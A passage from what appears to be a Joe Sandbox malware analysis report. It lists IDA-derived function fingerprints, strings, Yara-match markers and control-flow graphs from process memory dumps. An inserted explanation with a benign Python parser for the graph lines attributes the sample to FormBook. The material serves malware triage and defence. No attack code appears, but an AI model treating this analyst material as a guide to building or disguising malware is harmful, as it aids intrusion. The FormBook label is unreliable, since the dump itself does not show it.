                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01A37294
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 885266447-605551621
                                                                • Opcode ID: 01328441b18321590dc9a45f4591721960d635f777c1cd90b799838d9daa670b
                                                                • Instruction ID: 321849633cfeaaa6104f575f7c995d35dc6b52135d84f052f99b0112f99bea31
                                                                • Opcode Fuzzy Hash: 01328441b18321590dc9a45f4591721960d635f777c1cd90b799838d9daa670b
                                                                • Instruction Fuzzy Hash: 3C410271700202AFD721CFA9CD41F6AB7A5FB94B10F10061DFA5AAB280DB30F8568BD1
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$]:%u
                                                                • API String ID: 48624451-3050659472
                                                                • Opcode ID: 59c53199998cb86e126a3701b2ebc86fb1f2ffda866053d9484c5ace4c142ba3
                                                                • Instruction ID: d6bb77e1c5bb1cee5d18388460ac23e4fd2360a9d484350ca1b5140f32194c62
                                                                • Opcode Fuzzy Hash: 59c53199998cb86e126a3701b2ebc86fb1f2ffda866053d9484c5ace4c142ba3
                                                                • Instruction Fuzzy Hash: 4D319372A002199FDB20DF2DDD40BEEB7F8FF54610F44455AE949E3240EB30AB448BA0
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-
                                                                • API String ID: 1302938615-2137968064
                                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                • Instruction ID: 415167690a4b68f5e0e6cb0a09056a60b43caef496bb5da04675d4b2ab1bb369
                                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                • Instruction Fuzzy Hash: 5491B2B1E002169BEF26DFADE8806BEBBB5AF44320F54451EE995E72C0D734AD40CB51
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $$@
                                                                • API String ID: 0-1194432280
                                                                • Opcode ID: 1b52e26e3dba0dde6853e3bb802a36e964c6b3e8b1759b1f582232af408b0354
                                                                • Instruction ID: 79ecee8af4586b4101e0e72824e0f786931a1bfa7916fc84086cdaad4b079968
                                                                • Opcode Fuzzy Hash: 1b52e26e3dba0dde6853e3bb802a36e964c6b3e8b1759b1f582232af408b0354
                                                                • Instruction Fuzzy Hash: 07812B76D002699BDB31CB58CC45BEABBB8AB48714F0441EAEA0DB7240D7705E85CFA1

                                                                Execution Graph

                                                                Execution Coverage:3.2%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:3
                                                                Total number of Limit Nodes:0
                                                                execution_graph 17669 a5c83b 17670 a5c858 17669->17670 17671 a5c867 closesocket 17670->17671
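The `execution_graph` and `control_flow_graph` lines above are Joe Sandbox's flattened dump of a function graph: a decimal node id, one address token (a single address such as `a5c83b` or a basic-block range such as `39c1332-39c133c`), zero or more label tokens (`closesocket`, or `call <addr>`), and `A->B` edge tokens. The following is an added example, not code from the report or from Joe Sandbox, that rebuilds the adjacency list from such a line, checks it against the stated node total, and lists which Win32 APIs the graph reaches. The grammar is my reading of the lines on this page, not a documented format; the function names are mine, and the sample lines are copied from the report text above. One assumed limitation: a label token that is purely decimal would be misread as a node id.

```python
"""Parse Joe Sandbox 'execution_graph' / 'control_flow_graph' text dumps.

Grammar assumed from the lines on this page (my reading, not a documented
format): after the keyword, a decimal node id is followed by exactly one
address token ("a5c83b" or a range "39c1332-39c133c") and zero or more label
tokens ("closesocket", or "call <addr>"); "A->B" tokens are edges.
"""
import re

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID_RE = re.compile(r"^\d+$")
KEYWORDS = ("execution_graph", "control_flow_graph")

# Sample inputs copied from the report lines above (not constructed).
EXEC_GRAPH = ("execution_graph 17669 a5c83b 17670 a5c858 17669->17670 "
              "17671 a5c867 closesocket 17670->17671")
CFG_313 = ("control_flow_graph 313 39c1332-39c133c 314 39c139e-39c13b4 313->314 "
           "315 39c133e call 39c0921 313->315 317 39c13bc-39c140b 314->317 "
           "318 39c13b6 314->318 319 39c1343-39c1344 315->319 320 39c140d 317->320 "
           "321 39c1413-39c1460 317->321 318->317 322 39c1468-39c14c4 321->322 "
           "323 39c1462 321->323 323->322")
CFG_152 = "control_flow_graph 152 a5c83b-a5c875 call a342db call a5d43b closesocket"


def parse_graph(line):
    """Return (kind, nodes, edges); nodes maps id -> (address, [labels])."""
    tokens = line.split()
    if not tokens or tokens[0] not in KEYWORDS:
        raise ValueError("not a Joe Sandbox graph line: %r" % line[:40])
    kind, nodes, edges = tokens[0], {}, []
    current = None
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            current = None          # labels never follow an edge token
            i += 1
        elif NODE_ID_RE.match(tok) and i + 1 < len(tokens):
            current = int(tok)      # node id, then its mandatory address
            nodes[current] = (tokens[i + 1], [])
            i += 2
        elif current is not None:
            nodes[current][1].append(tok)   # label attached to the open node
            i += 1
        else:
            raise ValueError("unexpected token %r at position %d" % (tok, i))
    for a, b in edges:
        if a not in nodes or b not in nodes:
            raise ValueError("edge %d->%d references an unknown node" % (a, b))
    return kind, nodes, edges


def node_calls(labels):
    """Split labels into ('call', target) for internal calls and ('api', name)."""
    out, i = [], 0
    while i < len(labels):
        if labels[i] == "call" and i + 1 < len(labels):
            out.append(("call", labels[i + 1]))
            i += 2
        else:
            out.append(("api", labels[i]))
            i += 1
    return out


def roots(nodes, edges):
    """Nodes with no incoming edge, i.e. the function entry block(s)."""
    targets = {b for _, b in edges}
    return sorted(n for n in nodes if n not in targets)


def reachable(edges, start):
    """Iterative DFS; tolerates the self-loops (11->11, 89->89) CFGs contain."""
    succ = {}
    for a, b in edges:
        succ.setdefault(a, []).append(b)
    seen, stack = set(), [start]
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        stack.extend(succ.get(n, []))
    return seen


def api_calls(nodes, edges):
    """(address, api) for every API-labelled node reachable from an entry."""
    seen = set()
    for r in roots(nodes, edges):
        seen |= reachable(edges, r)
    out = []
    for n in sorted(seen):
        addr, labels = nodes[n]
        out.extend((addr, name) for what, name in node_calls(labels) if what == "api")
    return out


def summary(line):
    """Counts to compare with the report's 'Total number of Nodes' figure."""
    kind, nodes, edges = parse_graph(line)
    entry = roots(nodes, edges)
    seen = set()
    for r in entry:
        seen |= reachable(edges, r)
    return {"kind": kind, "nodes": len(nodes), "edges": len(edges),
            "roots": entry, "unreachable": sorted(set(nodes) - seen),
            "apis": api_calls(nodes, edges)}


if __name__ == "__main__":
    for sample in (EXEC_GRAPH, CFG_313, CFG_152):
        print(summary(sample))
```

For the execution graph above the summary reports 3 nodes, matching the report's "Total number of Nodes:3", a single entry block at a5c83b, and one reachable API, closesocket at a5c867. Running the same parser over the per-function `control_flow_graph` lines gives a quick way to spot graphs whose only labelled node is a network or credential API, which is where the triage time on a FormBook sample is best spent.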

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 313 39c1332-39c133c 314 39c139e-39c13b4 313->314 315 39c133e call 39c0921 313->315 317 39c13bc-39c140b 314->317 318 39c13b6 314->318 319 39c1343-39c1344 315->319 320 39c140d 317->320 321 39c1413-39c1460 317->321 318->317 320->321 322 39c1468-39c14c4 321->322 323 39c1462 321->323 323->322
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c0b0a1a7ab027f540a41a2cebfd3ccb166355b4acf1cc2c55d69095c2f33a959
                                                                • Instruction ID: a7f4700b4d374f4c246e51e7543f4d50d059fe6d4fa9a50fb13c36b6a5e9cae4
                                                                • Opcode Fuzzy Hash: c0b0a1a7ab027f540a41a2cebfd3ccb166355b4acf1cc2c55d69095c2f33a959
                                                                • Instruction Fuzzy Hash: FB31BE116583F14ED31E836D08BD679AFC28E9720174EC2EEDADA5F2E3C4888418D3A5

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 39c0901-39c0907 1 39c096f-39c0cd4 0->1 2 39c0909-39c091b 0->2 3 39c0ce5-39c0cf1 1->3 4 39c0cd6-39c0cdf 1->4 5 39c0cfe-39c0d16 3->5 6 39c0cf3-39c0cfc 3->6 4->3 7 39c0d27-39c0d30 5->7 6->4 8 39c0d40 7->8 9 39c0d32-39c0d3e 7->9 11 39c0d4a-39c0d63 8->11 9->7 11->11 12 39c0d65-39c0d6e 11->12 13 39c0e9c-39c0ea3 12->13 14 39c0d74-39c0d7b 12->14 17 39c0ec4-39c0ecd 13->17 18 39c0ea5-39c0ec2 13->18 15 39c0dbc-39c0dd5 14->15 16 39c0d7d-39c0dba 14->16 19 39c0de6-39c0def 15->19 16->14 20 39c101d-39c1024 17->20 21 39c0ed3-39c0edd 17->21 18->13 24 39c0e06-39c0e18 19->24 25 39c0df1-39c0e04 19->25 22 39c105b-39c1065 20->22 23 39c1026-39c1059 20->23 26 39c0eee-39c0ef7 21->26 27 39c1076-39c1082 22->27 23->20 29 39c0e1a-39c0e21 24->29 30 39c0e23-39c0e2d 24->30 25->19 31 39c0f08 call 39db8e1 26->31 32 39c0ef9-39c0f06 26->32 36 39c1084-39c1090 27->36 37 39c1092-39c109c 27->37 29->13 34 39c0e3e-39c0e4a 30->34 38 39c0f0d 31->38 33 39c0edf-39c0ee8 32->33 33->26 39 39c0e4c-39c0e58 34->39 40 39c0e5a-39c0e6d 34->40 36->27 42 39c10ad-39c10b9 37->42 43 39c0f10-39c0f1c 38->43 39->34 45 39c0e7e-39c0e8a 40->45 46 39c10cb-39c10d5 42->46 47 39c10bb-39c10c1 42->47 48 39c0f1e-39c0f3f 43->48 49 39c0f41-39c0f48 43->49 50 39c0e8c-39c0e95 45->50 51 39c0e97 45->51 54 39c10e6-39c10f2 46->54 52 39c10c9 47->52 53 39c10c3-39c10c6 47->53 48->43 55 39c0f7a-39c0f7e 49->55 56 39c0f4a-39c0f78 49->56 50->45 51->12 52->42 53->52 59 39c1109-39c1113 54->59 60 39c10f4-39c1107 54->60 63 39c0fa7-39c0fb1 55->63 64 39c0f80-39c0fa5 55->64 56->49 62 39c1124-39c1130 59->62 60->54 65 39c1148-39c1152 62->65 66 39c1132-39c113b 62->66 67 39c0fc2-39c0fce 63->67 64->55 70 39c1163-39c116f 65->70 68 39c113d-39c1143 66->68 69 39c1146 66->69 71 39c0fde-39c0fe8 67->71 72 39c0fd0-39c0fdc 67->72 68->69 69->62 74 39c1180-39c118a 70->74 75 39c1171-39c117e 70->75 77 39c0feb-39c0fef 71->77 72->67 79 39c119b-39c11a4 74->79 75->70 77->20 80 39c0ff1-39c101b 77->80 81 39c11bb-39c11c2 79->81 82 39c11a6-39c11b9 79->82 80->77 84 39c11ec-39c11f5 81->84 85 39c11c4-39c11d6 81->85 82->79 88 39c11f7-39c120f 84->88 89 39c1211-39c122a 84->89 86 39c11dd-39c11df 85->86 87 39c11d8-39c11dc 85->87 90 39c11ea 86->90 91 39c11e1-39c11e7 86->91 87->86 88->84 89->89 92 39c122c-39c1236 89->92 90->81 91->90 93 39c1247-39c124e 92->93 94 39c1250-39c1261 93->94 95 39c1263-39c126d 93->95 94->93 97 39c127e-39c1288 95->97 98 39c128a-39c12e0 97->98 99 39c12e2-39c12ec 97->99 98->97 100 39c12ee-39c130d 99->100 101 39c1320-39c1327 99->101 103 39c131e 100->103 104 39c130f-39c1318 100->104 103->99 104->103
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: /$#2$+$0$4$:c$BL$C$Gj$I$Y$^$_$`+$f$i>$m$t$t>$yv$zv$}$}
                                                                • API String ID: 0-3942510243
                                                                • Opcode ID: 6d6594cea4630f6e81d6a94a4e7ad06afddbc915cb6c5251649a00a08d966b90
                                                                • Instruction ID: 0130987a0d06e498599dbed2f60724893da0eaa9277f6830b401283afa4f61e8
                                                                • Opcode Fuzzy Hash: 6d6594cea4630f6e81d6a94a4e7ad06afddbc915cb6c5251649a00a08d966b90
                                                                • Instruction Fuzzy Hash: D3429BB0E152A8CFEB68CF45C8947DDBBB2BB45308F1085D9C14D6B281CB795A88CF56

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 6$O$S$\$s
                                                                • API String ID: 0-3854637164
                                                                • Opcode ID: 34835148c52b18033714975159add09a59853d8c6d7b47ae1c7b6fab0ac377f4
                                                                • Instruction ID: 2a8c59f2f57f56cd5f28a825c5d7553731dc797a6e95f9424e1f2d4aa7414195
                                                                • Opcode Fuzzy Hash: 34835148c52b18033714975159add09a59853d8c6d7b47ae1c7b6fab0ac377f4
                                                                • Instruction Fuzzy Hash: 7151B1B2D10218ABDB10EF94DC89AFEB37CEF84311F044299E9096B140EB745B54CBA2

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 152 a5c83b-a5c875 call a342db call a5d43b closesocket
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3126216814.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_9e0000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: closesocket
                                                                • String ID:
                                                                • API String ID: 2781271927-0
                                                                • Opcode ID: 55308f3f9ae74ef7eaa8f49620fff32250108903cd2da531039e6e7d2221ac36
                                                                • Instruction ID: cb2db26bfecff21ab254fb47ed14e2fb4a7d5e681f284a11394e75af5cd340bf
                                                                • Opcode Fuzzy Hash: 55308f3f9ae74ef7eaa8f49620fff32250108903cd2da531039e6e7d2221ac36
                                                                • Instruction Fuzzy Hash: D8E08C322006147BC620EBA9DC41DEB77ACEFC6311F804419FE08A7201CB71B9168BF0

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 157 39dccb1-39dcd1b call 39b7bc1 160 39dcd1d-39dcd26 call 39c6d11 157->160 161 39dcd49-39dcd50 157->161 163 39dcd2b-39dcd48 call 39b7a41 160->163
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 9=
                                                                • API String ID: 0-389403476
                                                                • Opcode ID: 1ba39770b36bb2efd0079e1446335265e113c75a81ecf2ac7fbceb1315de4861
                                                                • Instruction ID: d95341c94e525a7654b8fc14c3970810b55db6740c54e02e4e7c9c67b36bd06d
                                                                • Opcode Fuzzy Hash: 1ba39770b36bb2efd0079e1446335265e113c75a81ecf2ac7fbceb1315de4861
                                                                • Instruction Fuzzy Hash: E811D0B6D0121CAF8B00DFE9DD419EEBBF9EF88210F54456AE919E7200E7715A058FA1

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 182 39ba093-39ba0de 183 39ba0e1-39ba0f3 call 39ce551 182->183 186 39ba111-39ba14a call 39def81 183->186 187 39ba0f5-39ba0ff 183->187 190 39ba14f-39ba154 186->190 187->183 188 39ba101-39ba110 187->188 190->188 191 39ba156-39ba172 call 39de881 190->191 191->188 194 39ba174-39ba197 call 39df061 191->194 194->188 197 39ba19d-39ba1c0 call 39df061 194->197 197->188 200 39ba1c6-39ba1e4 197->200
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d3bb3fcb993e78ad3349eeaed30b0b2ffddea547d84ec4fdd42e6b3644fe4f0c
                                                                • Instruction ID: 2cdb5223e2df3fe740d2c8af927ba27fbb7e7500b6685c0bf6278c9548f780ce
                                                                • Opcode Fuzzy Hash: d3bb3fcb993e78ad3349eeaed30b0b2ffddea547d84ec4fdd42e6b3644fe4f0c
                                                                • Instruction Fuzzy Hash: 06412EB1D11219AFDB14CF99CD81AEEBBBCEF49710F10415AFA14EB240E7B19640CBA4

                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 54337d446fa869ba92829349f07c51fc25ec04c673d4127cdfb882d8e4ea316c
                                                                • Instruction ID: eb372120e869abd33066b8026f6750e27adf250ce4530068d2661507ef4e665c
                                                                • Opcode Fuzzy Hash: 54337d446fa869ba92829349f07c51fc25ec04c673d4127cdfb882d8e4ea316c
                                                                • Instruction Fuzzy Hash: A1311AB5A00649ABDB14DF98D841EEFB7B8EF88300F108219F919A7340D770AD158BA1
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ba98c41e336530404247d220aab491f9420333af4528bc8c5997651ad2a80bef
                                                                • Instruction ID: d959675c4abc4f5a91b780f687393d67993ccf37ace40f07afe5f112c16cf7d3
                                                                • Opcode Fuzzy Hash: ba98c41e336530404247d220aab491f9420333af4528bc8c5997651ad2a80bef
                                                                • Instruction Fuzzy Hash: 652119B5A00609ABDB14DF98D845EEF77B8EF88700F104249FD19AB240D770A9158BA5
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 243c135a4095cb6747dc3667deed954e439b7db5e3ad43846ca40462c780e62b
                                                                • Instruction ID: 59b4e76293a3f034627f109c649c38b7cb403d291e1f723e4f479bf2fd3c1ac5
                                                                • Opcode Fuzzy Hash: 243c135a4095cb6747dc3667deed954e439b7db5e3ad43846ca40462c780e62b
                                                                • Instruction Fuzzy Hash: F411C2B67803087BF720EA559C43FAB375C9BC4B51F244015FF09AE2C0E6B4B81146B9
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2ce462a3ec75bf52468d33be574df14a618b7a36356d41f72aac975e0b870155
                                                                • Instruction ID: 4be04faf7b5c6ac316bcab219603fe0acb87d2f9b504ceb59d8ece382917638e
                                                                • Opcode Fuzzy Hash: 2ce462a3ec75bf52468d33be574df14a618b7a36356d41f72aac975e0b870155
                                                                • Instruction Fuzzy Hash: 0B117C75944754BBD710EAA88C46FEB73ACEFC9700F104149F9195A280D7B0691587A1
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a8b047226e4cf2ee44a1ab719abde226497fa320677b12104342e7a5d5407d83
                                                                • Instruction ID: 9e66c472bd6b599d7d5d955468cd3853a38cebc7fe47f019fe91ec536211e3c3
                                                                • Opcode Fuzzy Hash: a8b047226e4cf2ee44a1ab719abde226497fa320677b12104342e7a5d5407d83
                                                                • Instruction Fuzzy Hash: 5E2124B6D0121DAFCB00DFA9D9418EFBBF9EF88200F04416AE909E7200E7705A008BA1
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1662f6d820b573e8cf825ced8c2dfc1149c67ff21fd4f63b6d7b1b91a47811d0
                                                                • Instruction ID: d28675311d7430ff0326fc6a04d27b9d7ac04bccee8da921dd6088ae82b16a41
                                                                • Opcode Fuzzy Hash: 1662f6d820b573e8cf825ced8c2dfc1149c67ff21fd4f63b6d7b1b91a47811d0
                                                                • Instruction Fuzzy Hash: 29114C75940349ABD710EAA8CC46FEF73ACEFC9710F104649F9196B284D7B169058BA1
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 016bd8ce1746197e8720e3a876af95e62b55fcc460ffb57a2bf48c7dd99eb0d8
                                                                • Instruction ID: 14b987ca7a371e80150e4668238a2be16647d02bd1880197bd2fafd7b7bc6011
                                                                • Opcode Fuzzy Hash: 016bd8ce1746197e8720e3a876af95e62b55fcc460ffb57a2bf48c7dd99eb0d8
                                                                • Instruction Fuzzy Hash: 49018CB6204248BBDB44DE99DD91EEB77ADAFCC714F508608BA09A7240D670EC518BA4
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ea9f83b476703569a497567ae94f9b55c767c8ae5c7d8084d9c0c4b31f86b8b3
                                                                • Instruction ID: 24be21fb244c1501560bb9178768bfaecbbf461875fc22ac8f2f68ee702eeb72
                                                                • Opcode Fuzzy Hash: ea9f83b476703569a497567ae94f9b55c767c8ae5c7d8084d9c0c4b31f86b8b3
                                                                • Instruction Fuzzy Hash: 0B01D3B6D11219AFCB40DFE8D9419EFBBF8AB48200F54426EE819F7240F7715A048BA1
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c88a105afdb57d754c3ccbf7dc919d1d2fb40ef74bf4e6a6c2ce3675636679be
                                                                • Instruction ID: 9679c7540c132bd81a4cc61a766a2e808c58a0f2b9102f1d5996bed7bb0ded64
                                                                • Opcode Fuzzy Hash: c88a105afdb57d754c3ccbf7dc919d1d2fb40ef74bf4e6a6c2ce3675636679be
                                                                • Instruction Fuzzy Hash: 34F0E073A102065BD7108E6DEC41BD6F7ACFFC4334F244222F858DB641E632D8518790
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0beca4c5030d87ac569e1118754566c271f2f3493c482814f00c1c50a5af95f8
                                                                • Instruction ID: 25c4c01b1de42990bf56cafd00aabddcf4c101f3833eedd9757868748c9e86e1
                                                                • Opcode Fuzzy Hash: 0beca4c5030d87ac569e1118754566c271f2f3493c482814f00c1c50a5af95f8
                                                                • Instruction Fuzzy Hash: 38F0F8B6204209BBDB10DF99DC85E9B77ADEFC8710F108509F91897240D670BD118BB0
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                                • Instruction ID: cea681e08875a9d83c8cfd66a42f0c4f2c2397c22b41c7ac82dff82d1172ec09
                                                                • Opcode Fuzzy Hash: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                                • Instruction Fuzzy Hash: B4E065B62043087BDA10EE99DC49FAB33ACEFC8710F004419F909AB241D7B0BD118BB4
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a7a89bf0b7ff1966d1fd272edeaf3f836e071a560e24df1aff220d124b7741e0
                                                                • Instruction ID: 76a1ef110398bb8de4049d235edb2c77c08d93eb200ae76f59defa91444314b0
                                                                • Opcode Fuzzy Hash: a7a89bf0b7ff1966d1fd272edeaf3f836e071a560e24df1aff220d124b7741e0
                                                                • Instruction Fuzzy Hash: EBF08271C1524CEBDF14CF64D841BDEBBB8EB04320F1087ADE8259B280E63497508781
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                                • Instruction ID: 4e0245658e2edca8316f0c70edf34f4e552144a094dc0bf916a6928bdf0e46f9
